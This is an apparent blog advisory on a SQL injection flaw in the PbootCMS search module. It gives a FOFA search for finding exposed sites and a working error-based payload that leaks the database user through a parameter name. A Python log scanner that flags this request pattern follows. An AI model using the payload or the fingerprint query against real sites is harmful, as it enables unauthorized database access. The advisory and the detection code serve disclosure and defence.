PbootCMS search SQL injection vulnerability
2022-07-19 15:22:00 【Lonely and lazy contract】
Vulnerability description
The PbootCMS search module contains a SQL injection vulnerability. Through the vulnerability, sensitive information can be obtained from the database.
Affected versions
PbootCMS < 1.2.1
Cyberspace mapping
FOFA:app="PBOOTCMS"
Vulnerability reproduction
The search box page is
The payload is
/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123
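A defensive check for the request shape shown above, where the SQL expression sits in a query-string parameter name rather than in the value of keyword. This is an added example, not code from the original post or from PbootCMS; the log format, client addresses and function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Names a search form normally sends: letters, digits, "_", "-", ".", "[", "]".
PLAIN_NAME = re.compile(r"[A-Za-z0-9_.\[\]-]+")
# Client address and request target from an access-log line
# (assumption: a combined-style log with the request in double quotes).
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines; the second carries the payload quoted on this page.
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Jul/2022:15:20:01 +0800] "GET /index.php/Search/index?keyword=phone&page=2 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [19/Jul/2022:15:22:00 +0800] "GET /index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123 HTTP/1.1" 200 812',
    '198.51.100.4 - - [19/Jul/2022:15:23:10 +0800] "GET /index.php/About/index HTTP/1.1" 200 2048',
]


def odd_param_names(target):
    """Return decoded parameter names that are not plain identifiers,
    for requests to the search controller only."""
    parts = urlsplit(target)
    if "/search/index" not in parts.path.lower():
        return []
    names = []
    # Split on "&" by hand so that ";" inside a name is kept as part of it.
    for pair in parts.query.split("&"):
        name = unquote(pair.split("=", 1)[0])  # decode %23 and similar
        if name and not PLAIN_NAME.fullmatch(name):
            names.append(name)
    return names


def scan(log_lines):
    """Return (client, [suspicious names]) for every flagged log line."""
    findings = []
    for line in log_lines:
        match = REQUEST.match(line)
        if not match:
            continue
        names = odd_param_names(match.group(2))
        if names:
            findings.append((match.group(1), names))
    return findings


if __name__ == "__main__":
    for client, names in scan(SAMPLE_LOG):
        print(client, names)
```

Checking only the value of keyword would miss this request, because the injected expression is carried in the parameter name.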
My personal blog
https://gylq.gitee.io/time/